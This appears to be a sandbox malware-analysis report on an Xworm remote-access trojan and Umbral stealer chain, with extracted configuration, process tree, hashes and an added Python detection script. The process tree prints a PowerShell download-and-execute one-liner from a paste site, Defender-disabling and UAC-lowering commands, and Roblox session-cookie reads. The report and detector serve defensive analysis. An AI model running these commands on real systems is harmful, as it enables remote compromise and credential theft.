Analysis

  • max time kernel
    299s
  • max time network
    299s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64, arch:x86, image:win10ltsc2021-20241211-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    04-01-2025 18:13

General

  • Target

    New Text Document.txt

  • Size

    48B

  • MD5

    534f5be9d239737fc0f7988c0d8f55ab

  • SHA1

    7bd8add72810ae2c725bcbd4f001ee37e1aef16e

  • SHA256

    bd9337e4327ce6c4b8cf3c2de54bc60605f93d59a87e4e6f1b9d90a4d73ec3bf

  • SHA512

    e6447c19a57b17c252f9569c22b737ae9ca2afb7ef307bf3d7513af96c4b95e1f66280277ad22c9e8cff0db99f6aea02c12965a04568766d2c2e2101e6f2f93b

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

AEfEUs08j7ZtP2B5

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/pv132qGS

  • aes.plain

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Umbral family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Executes commands via powershell.exe.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar secrets.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\system32\NOTEPAD.EXE
    C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\New Text Document.txt"
    1⤵
      PID:3628
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell "irm paste.fo/raw/7085afc2db6e | iex"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4584
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord
          3⤵
          • UAC bypass
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:716
        • C:\ProgramData\SVrB5SO0.exe
          "C:\ProgramData\SVrB5SO0.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:60
          • C:\Users\Admin\AppData\Local\Temp\svhost.exe
            "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
            4⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4768
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svhost.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4256
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4388
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4244
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4348
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" os get Caption
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4808
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" computersystem get totalphysicalmemory
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:3236
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4388
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2336
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              5⤵
              • Detects videocard installed
              • Suspicious behavior: EnumeratesProcesses
              PID:2536
          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
            "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1160
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3148
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3748
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4664
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2112
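The process tree above is a compact training set for command-line detection: a download-and-execute one-liner, Defender exclusions and protection switches, the ConsentPromptBehaviorAdmin change, a .ROBLOSECURITY cookie read and WMIC hardware recon. The script below is an added example for this report, not part of the sandbox's tooling or of the Xworm/Umbral code; it encodes those behaviours as regex rules over process-creation events and then rolls child hits up to the parent, so that a dropper whose own command line is innocuous (svhost.exe, PID 4768 above) is still surfaced. The event records are constructed from the command lines in this report plus one benign control; the field names pid/ppid/image/cmdline are an assumption about the log source (for example, parsed Sysmon Event ID 1).

```python
"""Score process-creation events for the PowerShell / Defender-tampering
patterns seen in the Xworm + Umbral chain. Added example; assumes events
are dicts with pid, ppid, image and cmdline (e.g. parsed Sysmon EventID 1)."""
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\Wbem\wmic.exe"

# (rule name, ATT&CK technique, case-insensitive regex over the command line)
RULES = [
    ("remote_script_download_exec", "T1059.001",
     r"\b(irm|invoke-restmethod|iwr|invoke-webrequest)\b.*\|\s*(iex|invoke-expression)\b"),
    ("defender_exclusion_added", "T1562.001",
     r"\badd-mppreference\b.*-exclusion(path|process|extension)\b"),
    ("defender_protection_disabled", "T1562.001",
     r"\bset-mppreference\b.*-disable(realtimemonitoring|ioavprotection"
     r"|scriptscanning|intrusionpreventionsystem)\b"),
    ("uac_prompt_disabled", "T1548.002",
     r"consentpromptbehavioradmin\b.*-value\s+0\b"),
    ("roblox_cookie_theft", "T1555",
     r"\.roblosecurity\b"),
    ("wmic_hardware_recon", "T1082",
     r"\bwmic(\.exe)?\b.*\b(csproduct|computersystem|os|win32_videocontroller)\b"),
]
COMPILED = [(n, t, re.compile(p, re.IGNORECASE)) for n, t, p in RULES]

# Constructed sample events modelled on the process tree in this report,
# plus one benign administrative command as a control (PID 9001).
SAMPLE_EVENTS = [
    {"pid": 4584, "ppid": 3784, "image": PS,
     "cmdline": 'Powershell "irm paste.fo/raw/7085afc2db6e | iex"'},
    {"pid": 716, "ppid": 4584, "image": PS,
     "cmdline": ("powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "
                 "$Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "
                 "\"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" "
                 "-Name \"ConsentPromptBehaviorAdmin\" -Value 0 -Type DWord")},
    {"pid": 60, "ppid": 4584, "image": r"C:\ProgramData\SVrB5SO0.exe",
     "cmdline": r'"C:\ProgramData\SVrB5SO0.exe"'},
    {"pid": 4768, "ppid": 60, "image": r"C:\Users\Admin\AppData\Local\Temp\svhost.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\svhost.exe"'},
    {"pid": 4256, "ppid": 4768, "image": PS,
     "cmdline": "\"powershell.exe\" Add-MpPreference -ExclusionPath "
                "'C:\\Users\\Admin\\AppData\\Local\\Temp\\svhost.exe'"},
    {"pid": 4388, "ppid": 4768, "image": PS,
     "cmdline": "\"powershell.exe\" Set-MpPreference -DisableIntrusionPreventionSystem $true "
                "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true"},
    {"pid": 4244, "ppid": 4768, "image": PS,
     "cmdline": "\"powershell.exe\" Get-ItemPropertyValue -Path "
                "HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"},
    {"pid": 2536, "ppid": 4768, "image": WMIC,
     "cmdline": '"wmic" path win32_VideoController get name'},
    {"pid": 9001, "ppid": 3784, "image": PS,
     "cmdline": "powershell.exe Get-Process | Sort-Object CPU -Descending"},
]


def classify(cmdline):
    """Return (rule, technique) pairs whose pattern matches this command line."""
    return [(n, t) for n, t, rx in COMPILED if rx.search(cmdline)]


def scan(events):
    """Map pid -> hits for every event that trips at least one rule."""
    hits = {}
    for ev in events:
        h = classify(ev["cmdline"])
        if h:
            hits[ev["pid"]] = h
    return hits


def suspicious_parents(events, min_distinct_rules=3):
    """Roll child hits up to the parent. A dropper like svhost.exe has a
    harmless-looking command line, but its children collectively trip several
    distinct rules. Returns ppid -> sorted list of rule names for parents
    whose children hit at least min_distinct_rules different rules."""
    by_parent = defaultdict(set)
    for ev in events:
        for name, _ in classify(ev["cmdline"]):
            by_parent[ev["ppid"]].add(name)
    return {ppid: sorted(names) for ppid, names in by_parent.items()
            if len(names) >= min_distinct_rules}


if __name__ == "__main__":
    for pid, h in scan(SAMPLE_EVENTS).items():
        print(pid, h)
    print("parents to triage:", suspicious_parents(SAMPLE_EVENTS))
```

The roll-up is the part worth keeping: the Defender exclusions in PIDs 4256/4388 and the recon in 4244/2536 are each low-signal alone, but four distinct rule families under one parent within a single run is a strong signal that PID 4768 is the process to image and hunt for across the estate.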

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\ProgramData\SVrB5SO0.exe

      Filesize

      122KB

      MD5

      23c81c7ea6b302b5171d035742228599

      SHA1

      83f6712a0f42802d39356edabf6b74f37e049edd

      SHA256

      797ec2edd1d1a40a58004e5cda724f010310cdb388c368cb19ebc2aef0505a51

      SHA512

      931a6d93ce3422479479f5cdd073781cfd5d35e0244996242138f2dc2ffec953a43922d4fa14b16dab661dfe58a0331e7d1b208f04a39f03d0ad2ab7bb1fb962

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      a5a313c269d40f81599ab2eefb92eed9

      SHA1

      552556a49fc472b0e393dc781d2829e17b33696a

      SHA256

      c898258b3a76429d23f5d5ade7656d456b95db4a89706661c3c42ad265d09248

      SHA512

      cd987bdf29fc0a0b72f9b9b74d9f6302250f1ebd3d25bff034b86d6626b86d330867bfc154c58a6d275b35ae9c8d10eca5d0090d53238064a4f12b0dfe0279ac

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      7230ed8c80fb91119c40c4e67d1f00fd

      SHA1

      c19f2601b8a2b2a2737746b88f98129a2f00fdf5

      SHA256

      c24a82bfe4b8218e6472444f025b6830978f0f7c3c8cbd9babcff9849a8d9f5b

      SHA512

      286bed9de29ea9cb9de834164f6848a35992136b34bcc2a0c0d8529a8777bab3dcff97a9e28bbcd31bd1c65ac7d31d2c2ef629dc6aedb9a376ceb1dd92871256

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      cce846d4d061ab3c9c60e2e4723afc37

      SHA1

      dbfb35606ef1ba6a8fe0761baf0a5a8d61ddc3d0

      SHA256

      05493954effa576bee288b5da8a22c2b8cf6b3f1f7a7f49d430ff7c959e78385

      SHA512

      c21366673b03e1fd661acba46d00200f83df5a40668f1c39abcf6e0d92370a8fc40758e487566fd7066b185f0658d9f149f293dce01235b60fbac8c40f4d7172

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      70c9d01fc2096706bfe72bc21a45c108

      SHA1

      256ba8ffe84ef7dd9d77900ece1a43a636cd98e1

      SHA256

      ea9ff8be4d6e90a9458c41c335d17eb32c1eef0babe7e8c103e22ee553f37f68

      SHA512

      bfb1a87344304d21e2a8e35e1ebfffa987dba9bf6c07b396a41b405670f1e44d9cb1884599ef943259ba05769873be144179ff52046e1ebb4a03bce4c52e3720

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      0586e4d581f74667aa789f5c0d00defb

      SHA1

      a32d715cc40f7f6c7b1ae83c6719ab913eda9d5b

      SHA256

      4c6d8dfece226095f6ce6c8c5a483d6660e020688f973cef35e970c91c4d605a

      SHA512

      10c6e93f5409c3287b088bf129d33b7ee99a3f54cdcf6f9828eab1b17fa199b9d1a0316a0f70718544327e0ff8cf258393db6d20e8d560b9b85fc956d0b4cdf2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      13e75a3f969f37dc72fd4852bdc7083c

      SHA1

      7dddedb04f386a47666202ca6597d90a2a04aad1

      SHA256

      f6c41d71efdb8e40b75efeeb26cfa0ad2789082baf128aee3a5dca26409077cf

      SHA512

      b92b49d957a2726b5001d515495a74f175965212da6c54d5fe6e4d35d8d5f6e38eccd3501dba1b26ac67ff86ffd9ceb1a34a6e0402417fd7583eca47a57dbd07

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      14ade977d5aee19d8d43a5545fb17aa4

      SHA1

      2f09f41411cd31ea761e878ef477a0a15f037823

      SHA256

      313690a5bea10becc948a438d4197abe7d6116e1f36cc094bfe63ac4b76bc704

      SHA512

      f7bf8a2e6a5fe5e4c60873e8e053227f7fdeb46a7336d95ae08b3aefa3e46c4310ac5185903f9854172604b1f1cdfffa7a9aeeea11464adebe6d999f46f999c9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      4336c1dcbfcf6963151f02a4bd556cc8

      SHA1

      f8ca05659224c4e6b35d0ec0b2bbb36cfc9b0b70

      SHA256

      9c1bbc5cee1d7b64f7a419a9513d2b3fb6468105d3ea1e8e9277a1f8ec813f8a

      SHA512

      6019711045a6f7de275f1958e4ad65366089c7ef3274a51fe985ccf5dea59e8c7b857b26ff94d476455e528115a20f7e02e4f744bdbd177253aa45279c6d8132

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      8cf2897e70a6afaf934a40e7818165c1

      SHA1

      5cb27c6bfd3fbe0950ef6a3d0917efb37dac1eb4

      SHA256

      3353b18f2f88189eb9d3aba57309f5ca6a259c396b08185d4d941ed15d3283b0

      SHA512

      0fa0b94a7f1d2f429ab0e49e88e35e10e8f81f429dfdcc39c8f3a1bd3df96445409e0a5bedb2e15cbaa69b4c852e0ff1cd0faf361753ac33aaced2dcdbd60a2f

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      af1cc13f412ef37a00e668df293b1584

      SHA1

      8973b3e622f187fcf484a0eb9fa692bf3e2103cb

      SHA256

      449c0c61734cf23f28ad05a7e528f55dd8a7c6ae7a723253707e5f73de187037

      SHA512

      75d954ec8b98f804d068635875fac06e9594874f0f5d6e2ad9d6267285d1d4a1de6309009de9e2956c6477a888db648396f77a1a49b58287d2683b8214e7a3d3

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_blharyk0.kwd.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\svchost.exe

      Filesize

      39KB

      MD5

      f705f2da1824f04ae5a190b8259c3971

      SHA1

      7e8f02accd7205e564696e791c4dbef66f2b3bd5

      SHA256

      06daf892bd82e2da28a493b7c9dff9b4d822e1d0ba55671772cd032885d6fb4f

      SHA512

      530d56a52067f26d9d50d8edefb68caa65b6be9c58692fc14c417fee7799e3f1ed1ba57b2159be91965034f733a5de7af5042b2297d6f02a6ad282b5b4aa0d56

    • C:\Users\Admin\AppData\Local\Temp\svhost.exe

      Filesize

      231KB

      MD5

      0c01352317f572daab13794a8dc3e3a5

      SHA1

      309b2c1c1d7ea267e4fec39b67f26450d72b30d5

      SHA256

      6c85ac3b26d88512a75af25509b4c5f0a1e345e9c03b3a38884382a70a4748bd

      SHA512

      7ccb1b18ce0090a83938cb84f98104714bb9866ab82df04ffc5a682f3bb7ad76cdf59c0b95cc2a725f58af4358c0f25537087e937296f45f54214d31aa4726ad

    • memory/60-44-0x0000000000260000-0x0000000000284000-memory.dmp

      Filesize

      144KB

    • memory/1160-75-0x0000000000A50000-0x0000000000A60000-memory.dmp

      Filesize

      64KB

    • memory/4584-28-0x00007FF9FE003000-0x00007FF9FE005000-memory.dmp

      Filesize

      8KB

    • memory/4584-13-0x00007FF9FE000000-0x00007FF9FEAC2000-memory.dmp

      Filesize

      10.8MB

    • memory/4584-194-0x00007FF9FE000000-0x00007FF9FEAC2000-memory.dmp

      Filesize

      10.8MB

    • memory/4584-1-0x0000015D6A7B0000-0x0000015D6A7D2000-memory.dmp

      Filesize

      136KB

    • memory/4584-11-0x00007FF9FE000000-0x00007FF9FEAC2000-memory.dmp

      Filesize

      10.8MB

    • memory/4584-29-0x00007FF9FE000000-0x00007FF9FEAC2000-memory.dmp

      Filesize

      10.8MB

    • memory/4584-0-0x00007FF9FE003000-0x00007FF9FE005000-memory.dmp

      Filesize

      8KB

    • memory/4584-14-0x0000015D6B020000-0x0000015D6B1E2000-memory.dmp

      Filesize

      1.8MB

    • memory/4584-12-0x00007FF9FE000000-0x00007FF9FEAC2000-memory.dmp

      Filesize

      10.8MB

    • memory/4768-136-0x0000022D456B0000-0x0000022D456BA000-memory.dmp

      Filesize

      40KB

    • memory/4768-73-0x0000022D2AFE0000-0x0000022D2B020000-memory.dmp

      Filesize

      256KB

    • memory/4768-137-0x0000022D45740000-0x0000022D45752000-memory.dmp

      Filesize

      72KB

    • memory/4768-102-0x0000022D45680000-0x0000022D4569E000-memory.dmp

      Filesize

      120KB

    • memory/4768-101-0x0000022D457A0000-0x0000022D45816000-memory.dmp

      Filesize

      472KB

    • memory/4768-100-0x0000022D456D0000-0x0000022D45720000-memory.dmp

      Filesize

      320KB